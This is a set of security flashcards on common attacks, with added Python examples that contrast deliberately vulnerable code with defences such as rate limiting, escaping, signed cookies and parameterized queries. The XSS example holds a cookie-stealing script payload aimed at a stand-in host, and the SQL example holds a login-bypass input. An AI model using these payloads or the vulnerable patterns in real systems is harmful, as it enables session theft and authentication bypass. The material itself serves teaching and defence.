Attacks Flashcards
How does a brute force attack work?
Systematically try every possible password (or key) until one works; the attacker needs no flaw in the system, only enough attempts, so the cost grows with the size of the keyspace
How can a brute force attack be made easier for the attacker?
Humans are predictable, so many passwords follow a pattern (dictionary words, keyboard walks, a word followed by a year or "!"). Trying a wordlist of likely passwords first (a dictionary attack) finds most of them long before an exhaustive search would
How can we defend against a brute force attack?
Timeouts - only allow x attempts per minute (rate limiting), and lock the account for a while once the limit is hit
Limit the number of attempts per account, and count unknown usernames too so the limit does not reveal which accounts exist
Captchas - should stop bots
Slow, salted password hashing (bcrypt, scrypt, Argon2, PBKDF2) so every guess, online or against a leaked database, is expensive
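Worked example of the attempt limit and lockout above, added here and not part of the original flashcards. It is a self-contained Python sketch: a per-account sliding-window counter of failed logins (the names LoginThrottle, AuthService, MAX_ATTEMPTS, WINDOW_SECONDS and LOCKOUT_SECONDS are this example's own), backed by salted PBKDF2 hashing, with a constructed six-word "wordlist" replayed against one account to show the lockout firing before the correct guess is reached.

```python
import hashlib
import hmac
import secrets
import time
from collections import defaultdict, deque

MAX_ATTEMPTS = 5        # failed logins allowed per account inside one window (assumed policy)
WINDOW_SECONDS = 60     # sliding window in which failures are counted
LOCKOUT_SECONDS = 300   # how long the account stays locked once the limit is hit


class LoginThrottle:
    """Per-account sliding-window limit on failed logins with a temporary lockout."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                    # injectable so a test can fast-forward time
        self.failures = defaultdict(deque)    # username -> timestamps of recent failures
        self.locked_until = {}                # username -> time at which the lockout expires

    def is_locked(self, user):
        until = self.locked_until.get(user)
        return until is not None and self.clock() < until

    def record_failure(self, user):
        now = self.clock()
        window = self.failures[user]
        while window and now - window[0] > WINDOW_SECONDS:   # drop failures outside the window
            window.popleft()
        window.append(now)
        if len(window) >= MAX_ATTEMPTS:
            self.locked_until[user] = now + LOCKOUT_SECONDS
            window.clear()

    def record_success(self, user):
        self.failures.pop(user, None)
        self.locked_until.pop(user, None)


class AuthService:
    """Stores salted PBKDF2 hashes (a slow hash) and consults the throttle before checking a password."""

    def __init__(self, throttle):
        self.throttle = throttle
        self.users = {}                       # username -> (salt, hash)
        self.dummy_salt = secrets.token_bytes(16)

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, user, password):
        salt = secrets.token_bytes(16)
        self.users[user] = (salt, self._hash(password, salt))

    def login(self, user, password):
        """Returns 'ok', 'bad_password', or 'locked'."""
        if self.throttle.is_locked(user):
            return "locked"                   # no password check at all while locked
        salt, stored = self.users.get(user, (self.dummy_salt, None))
        candidate = self._hash(password, salt)   # hash even for unknown users: same timing either way
        if stored is not None and hmac.compare_digest(stored, candidate):
            self.throttle.record_success(user)
            return "ok"
        self.throttle.record_failure(user)    # unknown users are throttled too (no enumeration hint)
        return "bad_password"


def simulate_guessing(service, user, guesses):
    """Replay a wordlist against one account; returns the service's answer for each guess."""
    return [service.login(user, g) for g in guesses]


if __name__ == "__main__":
    # Constructed demo: the attacker's sixth guess is the right one, but the lockout blocks it.
    service = AuthService(LoginThrottle())
    service.register("alice", "correct horse battery staple")
    wordlist = ["password", "123456", "qwerty", "letmein", "welcome", "correct horse battery staple"]
    print(simulate_guessing(service, "alice", wordlist))
```

The lockout key is the account, not the client IP, because a botnet trivially changes IPs; the hash is computed even for unknown usernames so response time does not tell the attacker which accounts exist.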
What is a man in the middle attack?
When a bad actor positions themselves between two parties, intercepts the data in transit, reads (and possibly alters) it, and forwards it to the intended recipient so that neither side notices
What is one type of cookie theft?
Session fixation - an attacker sets a victim's session ID to a value the attacker already knows (e.g. via a crafted link) and waits for the victim to log in; if the site keeps that ID after authentication, the attacker's copy is now an authenticated session
What is another type of cookie theft?
Malware on the victim's computer can steal the browser's cookie files; the attacker replays the session cookies to impersonate the victim on websites without ever knowing their password
What is cross site scripting?
Injecting attacker-controlled script into a web page that the site serves to other users (via input the server echoes back or stores without escaping), so victims' browsers run it as if it were the site's own trusted code; it can then read cookies, make requests as the user or rewrite the page
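Worked example of the injection above, added here and not taken from the original flashcards. The Python below renders two small fragments of a search page: the vulnerable version pastes user input straight into the HTML, the safe version escapes it, and a second pair shows that escaping alone does not cover the href context, where a javascript: URL survives html.escape and must be rejected by scheme. The payloads, function names and ALLOWED_SCHEMES are constructed for the example.

```python
import html
from urllib.parse import urlparse

# Constructed attacker inputs: one for an HTML text context, one for a link (href) context.
SCRIPT_PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
URL_PAYLOAD = "javascript:alert(document.cookie)"

ALLOWED_SCHEMES = {"http", "https"}   # assumption: only plain web links are wanted in this page


def render_results_vulnerable(query):
    """Reflected XSS: user input is pasted into the HTML verbatim, so the browser runs it."""
    return f"<h1>Results for: {query}</h1>"


def render_results_safe(query):
    """Same page with the input HTML-escaped; the browser now shows the tag as text."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def render_link_vulnerable(url, text):
    """Escaping alone is not enough in an href: a 'javascript:' URL passes html.escape untouched."""
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


def render_link_safe(url, text):
    """Validate the URL scheme for the href context, then escape for the HTML context."""
    if urlparse(url).scheme.lower() not in ALLOWED_SCHEMES:
        url = "#"          # refuse anything that is not plain http(s)
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


def contains_live_script(page):
    """Rough reviewer check over rendered output: an unescaped <script> tag or a javascript: href."""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    for page in (render_results_vulnerable(SCRIPT_PAYLOAD), render_results_safe(SCRIPT_PAYLOAD),
                 render_link_vulnerable(URL_PAYLOAD, "click"), render_link_safe(URL_PAYLOAD, "click")):
        print(contains_live_script(page), page)
```

The point of the second pair is that the correct defence depends on where in the document the input lands: HTML text needs entity escaping, attribute values need quoting plus escaping, URLs need scheme validation, and a template engine that auto-escapes handles only the first two.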
How can we defend against cookie theft?
Authentication and tamper detection - sign (HMAC) or encrypt cookies so a modified one is rejected
Regenerate the session ID on login so a fixated ID never becomes authenticated
Set the HttpOnly flag (script cannot read the cookie, which blunts XSS-based theft), Secure (HTTPS only) and SameSite, and expire sessions
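Worked example of tamper detection and session regeneration, added here and not part of the original flashcards. The Python below signs the session ID with HMAC-SHA256 so an altered cookie is rejected, keeps session state server-side, issues a fresh ID at login so a planted (fixated) ID is discarded, and emits the Set-Cookie header with the HttpOnly, Secure and SameSite attributes. SECRET_KEY, SessionStore and the fixation scenario are constructed for the example.

```python
import base64
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)   # assumption: a server-side key, never sent to the client


def sign_cookie(value, key=SECRET_KEY):
    """Append an HMAC-SHA256 tag so any change to `value` is detectable."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(tag).decode().rstrip("=")


def verify_cookie(cookie, key=SECRET_KEY):
    """Return the signed value, or None if the tag is missing or does not match."""
    value, sep, _tag = cookie.rpartition(".")
    if not sep or not value:
        return None
    if hmac.compare_digest(sign_cookie(value, key), cookie):   # constant-time comparison
        return value
    return None


class SessionStore:
    """Server-side sessions keyed by a random id; the cookie carries only the id."""

    def __init__(self):
        self.sessions = {}                     # session id -> username (None while anonymous)

    def new_session(self):
        sid = secrets.token_urlsafe(32)        # unguessable id (no '.' in the alphabet)
        self.sessions[sid] = None
        return sid

    def login(self, old_sid, username):
        # Regenerate the id on authentication: whatever id the browser had before login
        # (possibly one an attacker fixed) is discarded, so it never becomes authenticated.
        self.sessions.pop(old_sid, None)
        sid = self.new_session()
        self.sessions[sid] = username
        return sid

    def user_for(self, sid):
        return self.sessions.get(sid)


def set_cookie_header(sid):
    """HttpOnly keeps script away from it, Secure keeps it off plaintext HTTP, SameSite limits cross-site sends."""
    return f"Set-Cookie: session={sign_cookie(sid)}; Path=/; HttpOnly; Secure; SameSite=Lax"


def user_from_cookie(store, cookie_value):
    """Resolve an incoming cookie to a user: tamper check first, then session lookup."""
    sid = verify_cookie(cookie_value)
    return None if sid is None else store.user_for(sid)


def fixation_attempt(store):
    """Constructed scenario: the attacker is issued id A by the server, plants it in the
    victim's browser, and the victim then logs in. Returns (what the attacker sees, what the victim sees)."""
    planted = store.new_session()                        # server-issued id the attacker knows
    victim_sid = store.login(planted, "alice")           # victim authenticates with the planted id
    attacker_view = user_from_cookie(store, sign_cookie(planted))   # the cookie the server gave the attacker
    victim_view = user_from_cookie(store, sign_cookie(victim_sid))
    return attacker_view, victim_view


if __name__ == "__main__":
    store = SessionStore()
    print(fixation_attempt(store))            # attacker sees None, victim sees 'alice'
    print(set_cookie_header(store.new_session()))
```

Signing only proves the cookie was issued by the server; it does nothing against a copied cookie (the malware case), which is why the flags and short expiry matter alongside it.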
What is a DDoS attack?
Distributed denial of service - overwhelming a service with traffic from many sources at once so legitimate users cannot reach it
How does a DDoS attack work?
A botnet is created by infecting lots of computers with malware
On command, these all send thousands of requests to the target server(s) at once, exhausting its bandwidth, connection table or CPU
How can servers defend against DDoS attacks?
Traffic filtering - IP reputation lists, deep packet inspection, block/allow lists, rate limiting per source
Load balancing - spread traffic across several servers so no single one is saturated, and drop excess traffic as far upstream as possible
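Worked example of the filtering step above, added here and not part of the original flashcards. The Python below applies two of the listed checks in order, an IP reputation blocklist and a per-source sliding-window rate limit, to a constructed access log, and summarises the decisions per source IP. REPUTATION_BLOCKLIST, LOG_LINES, the log format "ip timestamp method path" and the thresholds are all assumptions of the example.

```python
import re
from collections import Counter, defaultdict, deque

# Constructed inputs: a reputation blocklist and a tiny access log ("ip timestamp method path").
REPUTATION_BLOCKLIST = {"203.0.113.9"}
RATE_LIMIT = 5        # requests per source IP allowed inside one window (assumed policy)
WINDOW_SECONDS = 1.0  # sliding window length

LOG_LINES = [
    "198.51.100.7 0.10 GET /",
    "198.51.100.7 0.40 GET /about",
    "203.0.113.9 0.45 GET /",            # source on the reputation list
    "192.0.2.1 0.50 GET /login",
    "192.0.2.1 0.52 GET /login",
    "192.0.2.1 0.54 GET /login",
    "192.0.2.1 0.56 GET /login",
    "192.0.2.1 0.58 GET /login",
    "192.0.2.1 0.60 GET /login",         # sixth request inside one second
    "192.0.2.1 0.62 GET /login",
    "198.51.100.7 2.00 GET /contact",
    "192.0.2.1 2.10 GET /login",         # the window has slid past the burst
]

LOG_RE = re.compile(r"^(\S+) (\d+(?:\.\d+)?) (\S+) (\S+)$")


def parse_line(line):
    """Return (ip, timestamp, method, path) or raise on a malformed line."""
    m = LOG_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ip, ts, method, path = m.groups()
    return ip, float(ts), method, path


class TrafficFilter:
    """Two cheap checks run in order: reputation blocklist, then per-IP sliding-window rate limit."""

    def __init__(self, blocklist, rate_limit=RATE_LIMIT, window=WINDOW_SECONDS):
        self.blocklist = set(blocklist)
        self.rate_limit = rate_limit
        self.window = window
        self.recent = defaultdict(deque)   # ip -> timestamps of requests seen inside the window

    def decide(self, ip, ts):
        if ip in self.blocklist:
            return "drop:blocklist"
        q = self.recent[ip]
        while q and ts - q[0] > self.window:   # forget requests older than the window
            q.popleft()
        q.append(ts)                           # dropped requests still count toward the limit
        if len(q) > self.rate_limit:
            return "drop:rate"
        return "allow"


def run_filter(lines, blocklist=REPUTATION_BLOCKLIST):
    """Apply the filter to log lines in order; returns a list of (ip, path, decision)."""
    f = TrafficFilter(blocklist)
    return [(ip, path, f.decide(ip, ts)) for ip, ts, _method, path in map(parse_line, lines)]


def summarize(decisions):
    """Count decisions per source IP: the view an operator wants when choosing what to block upstream."""
    summary = defaultdict(Counter)
    for ip, _path, decision in decisions:
        summary[ip][decision] += 1
    return {ip: dict(c) for ip, c in summary.items()}


if __name__ == "__main__":
    for ip, counts in summarize(run_filter(LOG_LINES)).items():
        print(ip, counts)
```

Per-source limits like this stop a single noisy client but not a volumetric attack spread over thousands of bots, each staying under the threshold; that is where upstream filtering capacity and load balancing from the other answer come in.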
What is a vertical privilege escalation attack?
When a lower-privilege user gains access to functions or data reserved for higher-privilege users (e.g. a normal user reaching an admin page)
What is a horizontal privilege escalation attack?
When a user accesses data reserved for other users at the same access level (e.g. bank user A reads user B's account by changing the account ID in the request)
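Worked example of both escalation types above, added here and not part of the original flashcards. The Python below models a bank with customer, teller and admin roles (ROLE_RANK, User, Account and the sample ACCOUNTS are constructed): a vulnerable balance lookup that only checks the caller is logged in (horizontal escalation), the same lookup with an ownership check, and an admin-only operation guarded by a role check (vertical escalation).

```python
from dataclasses import dataclass

ROLE_RANK = {"customer": 1, "teller": 2, "admin": 3}   # higher number = more privilege


class Forbidden(Exception):
    pass


@dataclass(frozen=True)
class User:
    name: str
    role: str


@dataclass
class Account:
    account_id: int
    owner: str
    balance: int
    frozen: bool = False


# Constructed sample data: two customers, one account each.
ACCOUNTS = {
    1001: Account(1001, "alice", 500),
    1002: Account(1002, "bob", 1200),
}


def require_role(user, minimum):
    """Vertical control: the caller's role must rank at least `minimum`."""
    if ROLE_RANK.get(user.role, 0) < ROLE_RANK[minimum]:
        raise Forbidden(f"{user.name} ({user.role}) lacks role {minimum}")


def get_balance_vulnerable(user, account_id):
    """Only checks that someone is logged in: any customer can read any account (horizontal escalation)."""
    return ACCOUNTS[account_id].balance


def get_balance(user, account_id):
    """Ownership check for customers; staff (teller or above) may read any account."""
    account = ACCOUNTS[account_id]
    if account.owner != user.name:
        require_role(user, "teller")
    return account.balance


def freeze_account(user, account_id):
    """Admin-only operation; a customer or teller calling it is a vertical escalation attempt."""
    require_role(user, "admin")
    ACCOUNTS[account_id].frozen = True
    return True


def attempt(fn, user, account_id):
    """Run an operation and report 'denied' instead of raising, for tabulating access checks."""
    try:
        return fn(user, account_id)
    except Forbidden:
        return "denied"


if __name__ == "__main__":
    bob = User("bob", "customer")
    print(get_balance_vulnerable(bob, 1001))      # bob reads alice's balance: 500
    print(attempt(get_balance, bob, 1001))        # with the ownership check: denied
    print(attempt(freeze_account, bob, 1001))     # customer on an admin action: denied
```

The check that closes the horizontal hole is on the object (who owns account 1001), not on the role; the check that closes the vertical hole is on the role. An authorization layer needs both, applied on every request, because the account ID in the request is attacker-controlled.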
What is an SQL injection attack?
When user input is concatenated straight into an SQL query string, so quotes and operators in the input change the structure of the query and let the attacker read, modify or bypass checks on the database
How can we protect from SQL injection attacks?
Sanitizing data: control what the user is allowed to input, and use parameterized queries (prepared statements) so input is passed as a value and never interpreted as SQL
Configure error reports: detailed database errors tell attackers a lot about the schema and the query; show users a generic message and keep the detail in the server log
Type checks: if the input is supposed to be an int, convert and validate it as an int before it goes anywhere near the query
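Worked example of the attack and the three defences above, added here and not part of the original flashcards. The Python below uses an in-memory SQLite database (the table, rows and function names are constructed): a login built by string concatenation that a quote-and-comment payload bypasses, the same query parameterized, an integer type check on an ID lookup, and an error handler that shows how verbose database errors leak detail compared with a generic message.

```python
import sqlite3


def make_db():
    """Constructed in-memory database. Passwords are plaintext here only so the injected
    query is easy to follow; a real system stores salted slow hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("alice", "alice-pw", 0), ("admin", "s3cret", 1)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the input becomes part of the SQL text."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes values separately, so quotes in them stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def get_username_by_id(conn, user_id):
    """Type check: coerce to int first so 'OR 1=1'-style input never reaches the query."""
    try:
        user_id = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("user id must be an integer")
    row = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


def login_with_error_handling(conn, username, password, verbose_errors=False):
    """Error reporting: a verbose handler hands the failing SQL details to the attacker;
    production returns a generic message and logs the exception server-side."""
    try:
        return ("ok", login_vulnerable(conn, username, password))
    except sqlite3.Error as exc:
        if verbose_errors:
            return ("error", f"{type(exc).__name__}: {exc}")   # debugging detail, never for users
        return ("error", "Login failed. Please try again.")


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "admin' --", "wrong"))     # admin: the comment removes the password check
    print(login_safe(conn, "admin' --", "wrong"))           # None: the quote is just data
    print(login_with_error_handling(conn, "admin'", "x", verbose_errors=True))
```

The payload admin' -- works because the closing quote ends the string literal and -- comments out the rest of the line, so the password condition is never evaluated; with a placeholder the whole string, quote and all, is compared against the username column and matches nothing.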